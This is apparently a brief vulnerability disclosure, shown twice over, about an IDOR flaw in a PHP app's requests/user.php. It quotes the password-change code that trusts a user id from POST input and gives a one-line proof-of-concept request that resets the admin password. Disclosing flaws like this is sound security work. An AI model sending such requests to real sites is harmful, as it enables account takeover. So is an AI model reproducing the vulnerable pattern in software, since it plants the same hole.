Note: The same type of IDOR vuln exists in a lot of other functions in user.php, but password change is most critical.
requests\user.php:
<?php case 'changep': $password = secureEncode($_POST['new_password']); if (strlen($password) < 6) { echo 'Error - '.$sm['lang'][654]['text']; exit; } $salt = base64_encode($_POST['new_password'].secureEncode($_POST['user'])); $pswd = crypt($password,$salt); $query = "UPDATE users SET pass = '".$pswd."',imported = '' WHERE id = '".secureEncode($_POST['user'])."'"; $mysqli->query($query); break;
Id value in the UPDATE query is controlled by user input. Any auth user can change a password for admin (id=1) or any other user.
Exploit POC would be something like:
POST /requests/user.php HTTP/1.1 action=changep&user=1&new_password=12345678
Note: The same type of IDOR vuln exists in a lot of other functions in user.php, but password change is most critical.
requests\user.php:
<?php case 'changep': $password = secureEncode($_POST['new_password']); if (strlen($password) < 6) { echo 'Error - '.$sm['lang'][654]['text']; exit; } $salt = base64_encode($_POST['new_password'].secureEncode($_POST['user'])); $pswd = crypt($password,$salt); $query = "UPDATE users SET pass = '".$pswd."',imported = '' WHERE id = '".secureEncode($_POST['user'])."'"; $mysqli->query($query); break;Id value in the UPDATE query is controlled by user input. Any auth user can change a password for admin (id=1) or any other user.
Exploit POC would be something like:
POST /requests/user.php HTTP/1.1 action=changep&user=1&new_password=12345678